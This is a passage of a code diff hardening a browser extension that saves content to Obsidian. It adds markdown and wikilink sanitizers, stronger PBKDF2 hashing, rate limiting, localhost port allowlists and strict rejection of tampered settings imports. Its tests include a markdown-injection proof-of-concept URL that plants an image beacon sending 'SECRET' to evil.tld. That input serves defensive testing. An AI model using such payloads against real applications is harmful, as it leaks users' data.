+        it('should escape [[wikilink]] pattern', () => {
+            expect(escapeObsidianWikilinks('See [[Note]]')).toBe('See \\[\\[Note\\]\\]');
+        });
+
+        it('should escape ![[embed]] pattern', () => {
+            expect(escapeObsidianWikilinks('See ![[Note]]')).toBe('See !\\[\\[Note\\]\\]');
+        });
+
+        it('should handle multiple wikilinks', () => {
+            const input = '[[A]] and [[B]]';
+            expect(escapeObsidianWikilinks(input)).toBe('\\[\\[A\\]\\] and \\[\\[B\\]\\]');
+        });
+
+        it('should return empty string for empty input', () => {
+            expect(escapeObsidianWikilinks('')).toBe('');
+        });
+
+        it('should handle null input', () => {
+            expect(escapeObsidianWikilinks(null as any)).toBeNull();
+        });
+
+        it('should handle undefined input', () => {
+            expect(escapeObsidianWikilinks(undefined as any)).toBeUndefined();
+        });
+
+        it('should not modify text without wikilinks', () => {
+            const input = 'Normal text without wikilinks';
+            expect(escapeObsidianWikilinks(input)).toBe(input);
+        });
+    });
+
+    describe('sanitizeUrlForMarkdownTarget', () => {
+        it('should encode parentheses', () => {
+            const input = 'https://evil.tld/x)![beacon](https://evil.tld/exfil.png';
+            const result = sanitizeUrlForMarkdownTarget(input);
+            expect(result).not.toContain(')');
+            expect(result).not.toContain('(');
+            expect(result).toContain('%29');
+            expect(result).toContain('%28');
+        });
+
+        it('should encode square brackets', () => {
+            const input = 'https://evil.tld/path[test]';
+            const result = sanitizeUrlForMarkdownTarget(input);
+            expect(result).not.toContain('[');
+            expect(result).not.toContain(']');
+            expect(result).toContain('%5B');
+            expect(result).toContain('%5D');
+        });
+
+        it('should encode exclamation marks', () => {
+            const input = 'https://evil.tld/!inject';
+            const result = sanitizeUrlForMarkdownTarget(input);
+            expect(result).not.toContain('!');
+            expect(result).toContain('%21');
+        });
+
+        it('should preserve normal URL characters', () => {
+            const input = 'https://example.com/path?q=hello&lang=en#section';
+            expect(sanitizeUrlForMarkdownTarget(input)).toBe(input);
+        });
+
+        it('should handle empty string', () => {
+            expect(sanitizeUrlForMarkdownTarget('')).toBe('');
+        });
+
+        it('should handle null input', () => {
+            expect(sanitizeUrlForMarkdownTarget(null as any)).toBeNull();
+        });
+
+        it('should handle VULN-001 PoC payload', () => {
+            const input = 'https://evil.tld/x)%20![beacon](https://evil.tld/exfil.png?leak=SECRET';
+            const result = sanitizeUrlForMarkdownTarget(input);
+            // After encoding, the result should not break out of markdown link syntax
+            expect(result).not.toContain(')');
+            expect(result).not.toContain('!');
+            expect(result).not.toContain('[');
         });
     });
 });

--- a/src/utils/__tests__/masterPassword.test.ts
+++ b/src/utils/__tests__/masterPassword.test.ts
@@ -24,7 +24,8 @@ vi.mock('../crypto.js', () => ({
     generateSalt: vi.fn(() => new Uint8Array(16).fill(1)),
     hashPasswordWithPBKDF2: vi.fn(async (_password: string, _salt: Uint8Array) => 'hashed_value'),
     verifyPasswordWithPBKDF2: vi.fn(async (password: string, hash: string, _salt: Uint8Array) => {
-        return password === 'correct_password' && hash === 'hashed_value';
+        const isValid = password === 'correct_password' && hash === 'hashed_value';
+        return { isValid, needsRehash: false };
     }),
     encrypt: vi.fn(async (plaintext: string, _key: CryptoKey) => ({
         ciphertext: 'encrypted_' + plaintext,

--- a/src/utils/__tests__/obsidianEnabled.test.ts
+++ b/src/utils/__tests__/obsidianEnabled.test.ts
@@ -22,7 +22,7 @@ vi.mock('../crypto.js', () => ({
   generateSalt: vi.fn(() => new Uint8Array(16)),
   deriveKey: vi.fn(async () => 'mock_key' as unknown as CryptoKey),
   hashPasswordWithPBKDF2: vi.fn(async () => 'hash'),
-  verifyPasswordWithPBKDF2: vi.fn(async () => true),
+  verifyPasswordWithPBKDF2: vi.fn(async () => ({ isValid: true, needsRehash: false })),
 }));
 
 vi.mock('../optimisticLock.js', () => ({

--- a/src/utils/__tests__/piiSanitizer.test.ts
+++ b/src/utils/__tests__/piiSanitizer.test.ts
@@ -680,10 +680,19 @@ describe('piiSanitizer', () => {
       expect(result.error).toContain('Input size exceeds maximum limit');
     });
 
-    test('タイムアウト0msでタイムアウトエラーを返す（メール多数）', async () => {
+    // VULN-019 CI fix: timeout=0 is timing-dependent and flaky.
+    // Original intent: verify timeout=0 does not hang or crash.
+    // The function may complete or reject depending on CPU timing; either is acceptable.
+    test('タイムアウト0msでもクラッシュしない（完了またはタイムアウト）', async () => {
       const manyEmails = Array.from({ length: 20 }, (_, i) => `user${i}@example.com`).join(' ');
-      const result = await sanitizeRegex(manyEmails, { timeout: 0 }) as SanitizeResult;
-      expect(result).toBeDefined();
+      try {
+        const result = await sanitizeRegex(manyEmails, { timeout: 0 }) as SanitizeResult;
+        // Either completes successfully...
+        expect(result).toBeDefined();
+      } catch (err) {
+        // ...or throws timeout error. Both outcomes are acceptable.
+        expect(String(err)).toMatch(/timed out/i);
+      }
     });
   });
 

--- a/src/utils/__tests__/settingsExportImport-signature.test.ts
+++ b/src/utils/__tests__/settingsExportImport-signature.test.ts
@@ -191,9 +191,8 @@ describe('設定ファイル署名強化: signature enforcement（Greenフェー
 
         // 【結果検証】改ざんされた署名でインポート拒否
         expect(result).toBeNull(); // 【確認内容】: インポートが拒否されたこと 🟢
-        expect(global.confirm).toHaveBeenCalledWith(
-            expect.stringContaining('signature verification failed')
-        ); // 【確認内容】: force import 確認が表示されたこと 🟢
+        // VULN-009 fix: confirm() dialog is no longer shown; import is unconditionally rejected
+        expect(global.confirm).not.toHaveBeenCalled();
     });
 
     /**
@@ -249,9 +248,8 @@ describe('設定ファイル署名強化: signature enforcement（Greenフェー
 
         // 【結果検証】データ改ざんでインポート拒否
         expect(result).toBeNull(); // 【確認内容】: インポートが拒否されたこと 🟢
-        expect(global.confirm).toHaveBeenCalledWith(
-            expect.stringContaining('signature verification failed')
-        ); // 【確認内容】: force import 確認が表示されたこと 🟢
+        // VULN-009 fix: confirm() dialog is no longer shown; import is unconditionally rejected
+        expect(global.confirm).not.toHaveBeenCalled();
     });
 
     /**

--- a/src/utils/__tests__/settingsExportImport.test.ts
+++ b/src/utils/__tests__/settingsExportImport.test.ts
@@ -108,7 +108,7 @@ vi.mock('../crypto.js', () => ({
     }),
     deriveKey: vi.fn(async () => 'mock_key'),
     hashPasswordWithPBKDF2: vi.fn(async () => 'hashed'),
-    verifyPasswordWithPBKDF2: vi.fn(async () => true),
+    verifyPasswordWithPBKDF2: vi.fn(async () => ({ isValid: true, needsRehash: false })),
     generateSalt: vi.fn(() => new Uint8Array(16).fill(42))
 }));
 
@@ -379,15 +379,12 @@ describe('settingsExportImport', () => {
             const signedData = { ...exportData, signature: 'wrong_signature' };
             const result = await importSettings(JSON.stringify(signedData));
 
-            expect(result).not.toBeNull();
-            expect(global.confirm).toHaveBeenCalled();
-
-            (global as any).confirm = vi.fn(() => true);
+            // VULN-009 fix: signature mismatch always returns null, no confirm() dialog
+            expect(result).toBeNull();
+            expect(global.confirm).not.toHaveBeenCalled();
         });
 
-        test('署名検証失敗時にconfirmで拒否するとnullを返す', async () => {
-            (global as any).confirm = vi.fn(() => false);
-
+        test('署名検証失敗時はconfirmなしで即座にnullを返す（VULN-009）', async () => {
             const exportData = {
                 version: '1.0.0',
                 exportedAt: new Date().toISOString(),
@@ -421,9 +418,7 @@ describe('settingsExportImport', () => {
             const result = await importSettings(JSON.stringify(signedData));
 
             expect(result).toBeNull();
-            expect(global.confirm).toHaveBeenCalled();
-
-            (global as any).confirm = vi.fn(() => true);
+            expect(global.confirm).not.toHaveBeenCalled();
         });
 
         test('apiKeyExcluded=false の場合はAPIキーを含めて保存する', async () => {
@@ -578,15 +573,12 @@ describe('settingsExportImport', () => {
             };
 
             const result = await importEncryptedSettings(JSON.stringify(encryptedData), 'password');
+            // VULN-010 fix: HMAC mismatch always returns null, no confirm() dialog
             expect(result).toBeNull();
-            expect(global.confirm).toHaveBeenCalled();
-
-            (global as any).confirm = vi.fn(() => true);
+            expect(global.confirm).not.toHaveBeenCalled();
         });
 
-        test('HMAC検証失敗時にconfirmで承認するとフォースインポートする', async () => {
-            (global as any).confirm = vi.fn(() => true);
-
+        test('HMAC検証失敗時はconfirmなしで即座にnullを返す（VULN-010）', async () => {
             const settings = {
                 obsidian_protocol: 'http',
                 obsidian_port: '27123',
@@ -630,9 +622,10 @@ describe('settingsExportImport', () => {
             };
 
             const result = await importEncryptedSettings(JSON.stringify(encryptedData), 'password');
-            expect(result).not.toBeNull();
-            expect(global.confirm).toHaveBeenCalled();
-            expect(saveSettings).toHaveBeenCalled();
+            // VULN-010 fix: HMAC mismatch always returns null
+            expect(result).toBeNull();
+            expect(global.confirm).not.toHaveBeenCalled();
+            expect(saveSettings).not.toHaveBeenCalled();
         });
 
         test('復号データの構造検証失敗時にnullを返す', async () => {

--- a/src/utils/__tests__/storage-extra.test.ts
+++ b/src/utils/__tests__/storage-extra.test.ts
@@ -25,7 +25,7 @@ vi.mock('../crypto.js', () => ({
   decryptApiKey: vi.fn(() => Promise.resolve('decrypted-key')),
   isEncrypted: vi.fn((v: unknown) => typeof v === 'string' && v.startsWith('encrypted:')),
   hashPasswordWithPBKDF2: vi.fn(() => Promise.resolve('hash')),
-  verifyPasswordWithPBKDF2: vi.fn(() => Promise.resolve(true)),
+  verifyPasswordWithPBKDF2: vi.fn(() => Promise.resolve({ isValid: true, needsRehash: false })),
 }));
 
 vi.mock('../optimisticLock.js', () => ({

--- a/src/utils/__tests__/storage-keys.test.ts
+++ b/src/utils/__tests__/storage-keys.test.ts
@@ -34,6 +34,7 @@ describe('getSettings key refinement', () => {
       StorageKeys.MIGRATION_CATEGORY_B_DEFAULT_DONE,
       StorageKeys.RECORDING_TRIGGERS,
       StorageKeys.SNAPSHOT_INTERVAL_MINUTES,
+      StorageKeys.MASTER_PASSWORD_KDF_ITERATIONS,
       StorageKeys.OPFS_FALLBACK_MODE,
       StorageKeys.MIGRATION_WHITELIST_EXTRACTION_DEFAULT_DONE,
     ];

--- a/src/utils/__tests__/storage-security.test.ts
+++ b/src/utils/__tests__/storage-security.test.ts
@@ -72,13 +72,19 @@ const storageData: Record<string, any> = { settings_migrated: true };
                 return Promise.resolve();
             })
         },
-            runtime: {
-                id: 'test-extension-id',
-                getURL: vi.fn(() => 'chrome-extension://test-extension-id/'),
-                reconnect: vi.fn(),
-                sendMessage: vi.fn(() => Promise.resolve())
-            }
-    }
+        session: {
+            get: vi.fn(() => Promise.resolve({})),
+            set: vi.fn(() => Promise.resolve()),
+            remove: vi.fn(() => Promise.resolve()),
+            clear: vi.fn(() => Promise.resolve()),
+        },
+    },
+    runtime: {
+        id: 'test-extension-id',
+        getURL: vi.fn(() => 'chrome-extension://test-extension-id/'),
+        reconnect: vi.fn(),
+        sendMessage: vi.fn(() => Promise.resolve())
+    },
 };
 
 
@@ -154,6 +160,12 @@ describe('Master Password Security', () => {
                         }
                         return Promise.resolve();
                     })
+                },
+                session: {
+                    get: vi.fn(() => Promise.resolve({})),
+                    set: vi.fn(() => Promise.resolve()),
+                    remove: vi.fn(() => Promise.resolve()),
+                    clear: vi.fn(() => Promise.resolve()),
                 },
             },
             runtime: {

--- a/src/utils/crypto.ts
+++ b/src/utils/crypto.ts
@@ -310,12 +310,13 @@ export async function computeHMAC(secret: string, message: string): Promise<stri
 
 /**
  * 【セキュリティ修正】PBKDF2を使用したパスワードハッシュ化
- * パスワードを安全に保存するため、PBKDF2でハッシュ化（100,000回のイテレーション）
+ * VULN-019 fix: 600,000 iterations (ENVELOPE_ITERATIONS) for stronger KDF
  * @param {string} password - パスワード
  * @param {Uint8Array} salt - ソルト
+ * @param {number} iterations - PBKDF2 iterations (default: ENVELOPE_ITERATIONS)
  * @returns {Promise<string>} Base64エンコードされたパスワードハッシュ
  */
-export async function hashPasswordWithPBKDF2(password: string, salt: Uint8Array): Promise<string> {
+export async function hashPasswordWithPBKDF2(password: string, salt: Uint8Array, iterations: number = ENVELOPE_ITERATIONS): Promise<string> {
     const webcrypto = getWebCrypto();
     const encoder = new TextEncoder();
     const passwordBuffer = encoder.encode(password);
@@ -332,7 +333,7 @@ export async function hashPasswordWithPBKDF2(password: string, salt: Uint8Array)
         {
             name: 'PBKDF2',
             salt: salt as BufferSource,
-            iterations: PBKDF2_ITERATIONS,
+            iterations,
             hash: HASH_ALGORITHM
         },
         baseKey,
@@ -344,15 +345,31 @@ export async function hashPasswordWithPBKDF2(password: string, salt: Uint8Array)
 }
 
 /**
+ * Legacy PBKDF2 iteration count used before VULN-019 fix
+ */
+const LEGACY_PBKDF2_ITERATIONS = 100000;
+
+/**
  * パスワードハッシュを検証する（PBKDF2）
+ * VULN-019 fix: tries new iteration count first, then falls back to legacy
+ * for backward compatibility with existing hashes
  * @param {string} password - 検証するパスワード
  * @param {string} storedHash - 保存されているハッシュ（Base64）
  * @param {Uint8Array} salt - 使用されたソルト
- * @returns {Promise<boolean>} パスワードが正しければtrue
+ * @returns {Promise<{isValid: boolean; needsRehash: boolean}>} 検証結果と再ハッシュ必要性
  */
-export async function verifyPasswordWithPBKDF2(password: string, storedHash: string, salt: Uint8Array): Promise<boolean> {
-    const computedHash = await hashPasswordWithPBKDF2(password, salt);
-    return constantTimeCompare(computedHash, storedHash);
+export async function verifyPasswordWithPBKDF2(password: string, storedHash: string, salt: Uint8Array): Promise<{ isValid: boolean; needsRehash: boolean }> {
+    // VULN-019 fix: try new iteration count first
+    const computedHash = await hashPasswordWithPBKDF2(password, salt, ENVELOPE_ITERATIONS);
+    if (await constantTimeCompare(computedHash, storedHash)) {
+        return { isValid: true, needsRehash: false };
+    }
+    // VULN-019 fix: fallback to legacy iteration count for existing hashes
+    const legacyHash = await hashPasswordWithPBKDF2(password, salt, LEGACY_PBKDF2_ITERATIONS);
+    if (await constantTimeCompare(legacyHash, storedHash)) {
+        return { isValid: true, needsRehash: true };
+    }
+    return { isValid: false, needsRehash: false };
 }
 
 // ============================================================================
@@ -513,7 +530,7 @@ export async function hashUrl(url: string): Promise<string> {
 // ============================================================================
 
 export const CURRENT_ENVELOPE_VERSION = 2;
-const ENVELOPE_ITERATIONS = 600_000;
+export const ENVELOPE_ITERATIONS = 600_000;
 const ENVELOPE_HASH: 'SHA-256' = 'SHA-256';
 
 export interface EncryptionEnvelope {

--- a/src/utils/cspValidator.ts
+++ b/src/utils/cspValidator.ts
@@ -244,14 +244,27 @@ export class CSPValidator {
         return true;
       }
 
-      // 非AIドメイン（Tranco, uBlock, localhost）
+      // 非AIドメイン（Tranco, uBlock）
       if (domain === 'tranco-list.eu' ||
           domain === 'easylist.to' ||
           domain === 'pgl.yoyo.org' ||
-          domain === 'nsfw.oisd.nl' ||
-          domain === 'localhost' ||
-          domain.startsWith('127.0.0.1')) {
+          domain === 'nsfw.oisd.nl') {
         return true;
+      }
+
+      // VULN-013 fix: localhost/loopback with port allowlist
+      // Only allow ports declared in host_permissions
+      const ALLOWED_LOCALHOST_PORTS = new Set([27123, 27124, 11434, 1234]);
+      const port = parsed.port ? parseInt(parsed.port, 10) : (parsed.protocol === 'https:' ? 443 : 80);
+
+      if (domain === 'localhost') {
+        return ALLOWED_LOCALHOST_PORTS.has(port);
+      }
+
+      // VULN-013 fix: strict IPv4 loopback check (anchored regex)
+      // Prevents '127.attacker.example' from matching
+      if (/^127\.\d{1,3}\.\d{1,3}\.\d{1,3}$/.test(domain)) {
+        return ALLOWED_LOCALHOST_PORTS.has(port);
       }
 
       return false;

--- a/src/utils/domainUtils.ts
+++ b/src/utils/domainUtils.ts
@@ -48,6 +48,12 @@ export function extractDomain(url: string): string | null {
 }
 
 /**
+ * Maximum number of wildcards allowed in a single pattern.
+ * Prevents ReDoS (VULN-011) by limiting the regex complexity.
+ */
+const MAX_WILDCARDS_PER_PATTERN = 5;
+
+/**
  * Check if a domain matches a pattern (supports wildcards)
  * @param {string} domain - The domain to check
  * @param {string} pattern - The pattern to match against (supports wildcards)
@@ -56,6 +62,11 @@ export function extractDomain(url: string): string | null {
 export function matchesPattern(domain: string, pattern: string): boolean {
     // Convert wildcard pattern to regex
     if (pattern.includes('*')) {
+        // VULN-011 fix: limit wildcard count to prevent ReDoS
+        const wildcardCount = (pattern.match(/\*/g) || []).length;
+        if (wildcardCount > MAX_WILDCARDS_PER_PATTERN) {
+            return false;
+        }
         // 【Code Review #3】: 全ての正規表現特殊文字をエスケープしてからワイルドカードを処理
         const escaped = pattern.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
         // ワイルドカード（\*）を .* に変換

--- a/src/utils/fetch.ts
+++ b/src/utils/fetch.ts
@@ -291,19 +291,40 @@ export function isUrlAllowed(url: string, allowedUrls: Set<string> | null): bool
 }
 
 /**
+ * VULN-013 fix: Allowed localhost ports (matching host_permissions in manifest)
+ */
+const ALLOWED_LOCALHOST_PORTS = new Set([27123, 27124, 11434, 1234]);
+
+/**
  * ローカルAI用ホスト名かどうか判定（127.x.x.x / ::1）
  * Ollama、LM Studio等のローカルLLMサーバー向け
+ * VULN-013 fix: ポート番号も検証し、許可されたポートのみ信頼する
  */
-function isLocalhostAddress(hostname: string): boolean {
-  // 127.x.x.x (ループバックIPv4)
-  const ipv4Match = hostname.match(/^(\d{1,3})\./);
-  if (ipv4Match && Number(ipv4Match[1]) === 127) return true;
+function isLocalhostAddress(hostname: string, port?: number): boolean {
+  // 127.x.x.x (ループバックIPv4) — VULN-013 fix: fully anchored regex
+  if (/^127\.\d{1,3}\.\d{1,3}\.\d{1,3}$/.test(hostname)) {
+    // If port is specified, check against allowlist
+    if (port !== undefined) {
+      return ALLOWED_LOCALHOST_PORTS.has(port);
+    }
+    return true;
+  }
 
   // ::1 (IPv6ループバック)
-  if (hostname.toLowerCase() === '::1') return true;
+  if (hostname.toLowerCase() === '::1') {
+    if (port !== undefined) {
+      return ALLOWED_LOCALHOST_PORTS.has(port);
+    }
+    return true;
+  }
 
   // ::ffff:127.x.x.x (IPv4マップ)
-  if (hostname.toLowerCase().startsWith('::ffff:127.')) return true;
+  if (hostname.toLowerCase().startsWith('::ffff:127.')) {
+    if (port !== undefined) {
+      return ALLOWED_LOCALHOST_PORTS.has(port);
+    }
+    return true;
+  }
 
   return false;
 }
@@ -323,9 +344,10 @@ export function validateUrlForAIRequests(url: string): void {
   });
 
   const parsedUrl = new URL(url);
+  const port = parsedUrl.port ? parseInt(parsedUrl.port, 10) : (parsedUrl.protocol === 'https:' ? 443 : 80);
 
-  // ローカルAI用アドレス（127.x.x.x / ::1）は許可
-  if (isLocalhostAddress(parsedUrl.hostname)) {
+  // ローカルAI用アドレス（127.x.x.x / ::1）は許可（ポート制限付き）
+  if (isLocalhostAddress(parsedUrl.hostname, port)) {
     return;
   }
 

--- a/src/utils/markdownSanitizer.ts
+++ b/src/utils/markdownSanitizer.ts
@@ -59,12 +59,47 @@ export function sanitizeAllMarkdownLinks(text: string): string {
 }
 
 /**
+ * Escape Obsidian wikilink/embed syntax
+ *
+ * Targets [[wikilink]] and ![[embed]] patterns so they are rendered
+ * as literal text instead of being interpreted by Obsidian.
+ *
+ * @param text - text to escape
+ * @returns text with wikilink syntax escaped
+ */
+export function escapeObsidianWikilinks(text: string): string {
+    if (!text || typeof text !== 'string') return text;
+    return text.replace(/(!?)\[\[([^\]]*)\]\]/g, (_m, bang, inner) => `${bang}\\[\\[${inner}\\]\\]`);
+}
+
+/**
+ * Sanitize URL for embedding inside a Markdown link target `(url)`
+ *
+ * Percent-encodes characters that can break out of a Markdown link:
+ * `)`, `(`, `[`, `]`, `!`
+ * This preserves normal URL readability while preventing injection.
+ *
+ * @param url - raw URL string
+ * @returns URL safe for embedding in `[title](url)`
+ */
+export function sanitizeUrlForMarkdownTarget(url: string): string {
+    if (!url || typeof url !== 'string') return url;
+    // Encode characters dangerous for Markdown link syntax
+    return url
+        .replace(/\)/g, '%29')
+        .replace(/\(/g, '%28')
+        .replace(/\[/g, '%5B')
+        .replace(/\]/g, '%5D')
+        .replace(/!/g, '%21');
+}
+
+/**
  * Obsidian保存用のコンテンツをサニタイズする
- * 
+ *
  * 【処理内容】:
- * 1. Markdownリンク形式のエスケープ
- * 2. その他必要なサニタイズ処理があれば追加
- * 
+ * 1. スキーム非依存のMarkdownリンクエスケープ（sanitizeAllMarkdownLinks）
+ * 2. Obsidian wikilink/embed 構文のエスケープ（escapeObsidianWikilinks）
+ *
  * @param {string} content - サニタイズするコンテンツ
  * @returns {string} サニタイズされたコンテンツ
  */
@@ -73,8 +108,11 @@ export function sanitizeForObsidian(content: string): string {
         return content;
     }
 
-    // Markdownリンクをエスケープ
-    let sanitized = sanitizeMarkdownLinks(content);
+    // Escape all Markdown links regardless of URL scheme (VULN-002/005 fix)
+    let sanitized = sanitizeAllMarkdownLinks(content);
+
+    // Escape Obsidian wikilink/embed syntax (VULN-002/005 fix)
+    sanitized = escapeObsidianWikilinks(sanitized);
 
     return sanitized;
 }

--- a/src/utils/masterPassword.ts
+++ b/src/utils/masterPassword.ts
@@ -154,11 +154,17 @@ export async function verifyMasterPassword(
         // Base64デコード
         const salt = new Uint8Array(atob(saltBase64).split('').map(c => c.charCodeAt(0)));
 
-        // パスワード検証
-        const isValid = await verifyPasswordWithPBKDF2(password, hash, salt);
+        // パスワード検証（VULN-019: returns {isValid, needsRehash}）
+        const verifyResult = await verifyPasswordWithPBKDF2(password, hash, salt);
 
-        if (!isValid) {
+        if (!verifyResult.isValid) {
             return { success: false, error: 'Incorrect password' };
+        }
+
+        // VULN-019 fix: re-hash with new iteration count if legacy hash was used
+        if (verifyResult.needsRehash) {
+            const newHash = await hashPasswordWithPBKDF2(password, salt);
+            await chrome.storage.local.set({ master_password_hash: newHash });
         }
 
         return { success: true };

--- a/src/utils/settingsExportImport.ts
+++ b/src/utils/settingsExportImport.ts
@@ -182,16 +182,9 @@ export async function importEncryptedSettings(
         ErrorCode.SETTINGS_SIGNATURE_FAILURE,
         'settingsExportImport.ts'
       );
-      const forceImport = confirm(chrome.i18n.getMessage('hmacVerificationFailedConfirm'));
-      if (!forceImport) {
-        return null;
-      }
-      await logWarn(
-        'Force importing encrypted settings despite HMAC verification failure',
-        {},
-        ErrorCode.SETTINGS_SIGNATURE_FAILURE,
-        'settingsExportImport.ts'
-      );
+      // VULN-010 fix: reject import unconditionally when HMAC verification fails
+      // Do not allow force-import via confirm() dialog as it bypasses integrity check
+      return null;
     }
 
     // 復号されたJSONを解析してインポート
@@ -406,16 +399,9 @@ export async function importSettings(jsonData: string): Promise<Settings | null>
         ErrorCode.SETTINGS_SIGNATURE_FAILURE,
         'settingsExportImport.ts'
       );
-      const forceImport = confirm(chrome.i18n.getMessage('hmacVerificationFailedConfirm'));
-      if (!forceImport) {
-        return null;
-      }
-      await logWarn(
-        'Force importing settings despite signature verification failure',
-        {},
-        ErrorCode.SETTINGS_SIGNATURE_FAILURE,
-        'settingsExportImport.ts'
-      );
+      // VULN-009 fix: reject import unconditionally when signature verification fails
+      // Do not allow force-import via confirm() dialog as it bypasses integrity check
+      return null;
     }
 
     // 構造検証（既存のvalidateExportDataを使用）

--- a/src/utils/storage/encryptionSession.ts
+++ b/src/utils/storage/encryptionSession.ts
@@ -11,9 +11,11 @@ import {
     generateSalt,
     deriveKey,
     hashPasswordWithPBKDF2,
-    verifyPasswordWithPBKDF2
+    verifyPasswordWithPBKDF2,
+    ENVELOPE_ITERATIONS
 } from '../crypto.js';
 import { StorageKeys } from './types.js';
+import { checkRateLimit, recordFailedAttempt, resetFailedAttempts } from '../rateLimiter.js';
 
 // ============================================================================
 // Module-private session state
@@ -40,8 +42,12 @@ function base64ToUint8Array(base64: string): Uint8Array {
 /**
  * パスワードから暗号化キーを導出する（PBKDF2、extensionIdなし）
  * マスターパスワード方式専用
+ * VULN-019 fix: uses stored iteration count with fallback to legacy
  */
 async function deriveKeyFromPassword(password: string, salt: Uint8Array): Promise<CryptoKey> {
+    // VULN-019 fix: use stored iteration count or ENVELOPE_ITERATIONS for new setups
+    const kdfResult = await chrome.storage.local.get([StorageKeys.MASTER_PASSWORD_KDF_ITERATIONS]);
+    const iterations = (kdfResult[StorageKeys.MASTER_PASSWORD_KDF_ITERATIONS] as number) || ENVELOPE_ITERATIONS;
     const webcrypto = global.crypto || crypto;
     const encoder = new TextEncoder();
     const passwordBuffer = encoder.encode(password);
@@ -58,7 +64,7 @@ async function deriveKeyFromPassword(password: string, salt: Uint8Array): Promis
         {
             name: 'PBKDF2',
             salt: salt as BufferSource,
-            iterations: 100000,
+            iterations,
             hash: 'SHA-256'
         },
         baseKey,
@@ -85,7 +91,14 @@ async function deriveKeyFromPassword(password: string, salt: Uint8Array): Promis
  * @throws {Error} ロックされている場合（マスターパスワード未入力）
  */
 export async function getOrCreateEncryptionKey(): Promise<CryptoKey> {
+    // VULN-017 fix: check IS_LOCKED before returning cached key
     if (cachedEncryptionKey) {
+        const lockStatus = await chrome.storage.local.get([StorageKeys.IS_LOCKED]);
+        if (lockStatus[StorageKeys.IS_LOCKED]) {
+            cachedEncryptionKey = null;
+            cachedMasterPassword = null;
+            throw new Error('ENCRYPTION_LOCKED: Session is locked');
+        }
         return cachedEncryptionKey;
     }
 
@@ -221,6 +234,12 @@ export async function setMasterPassword(password: string): Promise<boolean> {
  * @returns {Promise<boolean>} 成功した場合true
  */
 export async function unlockWithPassword(password: string): Promise<boolean> {
+    // VULN-018 fix: check rate limit before attempting password verification
+    const rateLimitResult = await checkRateLimit();
+    if (!rateLimitResult.success) {
+        throw new Error(rateLimitResult.error || 'Too many attempts. Please try again later.');
+    }
+
     const result = await chrome.storage.local.get([
         StorageKeys.MASTER_PASSWORD_HASH,
         StorageKeys.MASTER_PASSWORD_SALT,
@@ -240,9 +259,17 @@ export async function unlockWithPassword(password: string): Promise<boolean> {
     }
 
     const salt = base64ToUint8Array(saltBase64);
-    const isValid = await verifyPasswordWithPBKDF2(password, storedHash, salt);
+    const verifyResult = await verifyPasswordWithPBKDF2(password, storedHash, salt);
 
-    if (isValid) {
+    if (verifyResult.isValid) {
+        // VULN-019 fix: re-hash with new iteration count if legacy hash was used
+        if (verifyResult.needsRehash) {
+            const newHash = await hashPasswordWithPBKDF2(password, salt);
+            await chrome.storage.local.set({ [StorageKeys.MASTER_PASSWORD_HASH]: newHash });
+            logInfo('Migrated master password hash to stronger KDF (600,000 iterations)');
+        }
+        // VULN-018 fix: reset failed attempts on successful authentication
+        await resetFailedAttempts();
         // アクティビティ通知を送信（sessionAlarmsManager.tsへ）
         chrome.runtime.sendMessage({ type: 'ACTIVITY_UPDATE', protocolVersion: CURRENT_PROTOCOL_VERSION, payload: {} }).catch((error) => {
             // 送信失敗は無視（Service Workerが起動していない可能性）
@@ -254,6 +281,8 @@ export async function unlockWithPassword(password: string): Promise<boolean> {
         return true;
     }
 
+    // VULN-018 fix: record failed attempt
+    await recordFailedAttempt();
     return false;
 }
 

--- a/src/utils/storage/settingsStore.ts
+++ b/src/utils/storage/settingsStore.ts
@@ -442,6 +442,11 @@ export async function saveSettings(
     await withOptimisticLock('settings', (currentSettings: Settings) => {
         return { ...currentSettings, ...toSave };
     });
+
+    // VULN-014 fix: invalidate cache after save completes
+    // The getSettings() call at line 395 may have re-populated cachedSettings
+    // with stale data. Clear it again to ensure subsequent reads get fresh data.
+    cachedSettings = null;
 }
 
 /**

--- a/src/utils/storage/types.ts
+++ b/src/utils/storage/types.ts
@@ -79,6 +79,7 @@ export const StorageKeys = {
     MASTER_PASSWORD_ENABLED: 'master_password_enabled', // マスターパスワード設定済みフラグ
     MASTER_PASSWORD_SALT: 'master_password_salt',       // マスターパスワード用ソルト（Base64）
     MASTER_PASSWORD_HASH: 'master_password_hash',       // マスターパスワードのハッシュ（Base64）
+    MASTER_PASSWORD_KDF_ITERATIONS: 'master_password_kdf_iterations', // KDF反復回数（VULN-019）
     IS_LOCKED: 'is_locked',                  // 暗号化がロックされているかどうか
     // 【マスターパスワード保護オプション】
     MP_PROTECTION_ENABLED: 'mp_protection_enabled',    // マスターパスワード保護有効フラグ
@@ -304,6 +305,7 @@ export interface StorageKeyValues {
     [StorageKeys.MASTER_PASSWORD_ENABLED]: boolean;
     [StorageKeys.MASTER_PASSWORD_SALT]: string;
     [StorageKeys.MASTER_PASSWORD_HASH]: string;
+    [StorageKeys.MASTER_PASSWORD_KDF_ITERATIONS]: number;
     [StorageKeys.IS_LOCKED]: boolean;
     [StorageKeys.MP_PROTECTION_ENABLED]: boolean;
     [StorageKeys.MP_ENCRYPT_API_KEYS]: boolean;

--- a/src/utils/ublockParser/index.ts
+++ b/src/utils/ublockParser/index.ts
@@ -128,8 +128,26 @@ export function parseUblockFilterListWithErrors(text: string): ParseResultWithEr
     //     return { ...cached, errors: cached.errors || [] }; // ディープコピーして返す
     //   }
 
+    // VULN-012 fix: limit input size to prevent memory exhaustion
+    const MAX_INPUT_SIZE = 10 * 1024 * 1024; // 10MB
+    if (text.length > MAX_INPUT_SIZE) {
+        return {
+            rules: createEmptyRuleset(),
+            errors: [{ lineNumber: 0, line: '', message: `Input too large: ${Math.round(text.length / 1024 / 1024)}MB exceeds ${MAX_INPUT_SIZE / 1024 / 1024}MB limit` }]
+        };
+    }
+
     // 【行分割】: 改行区切りのテキストを配列に変換 🟢
     const lines = text.split('\n');
+
+    // VULN-012 fix: limit line count to prevent excessive processing
+    const MAX_LINES = 500000;
+    if (lines.length > MAX_LINES) {
+        return {
+            rules: createEmptyRuleset(),
+            errors: [{ lineNumber: 0, line: '', message: `Too many lines: ${lines.length} exceeds ${MAX_LINES} limit` }]
+        };
+    }
 
     // 【配列初期化】: ルール格納用配列 🟢
     const blockRules: UblockRule[] = [];
@@ -238,8 +256,20 @@ export function parseUblockFilterList(text: string): UblockRules {
         return { ...(cached as UblockRules) };
     }
 
+    // VULN-012 fix: limit input size to prevent memory exhaustion
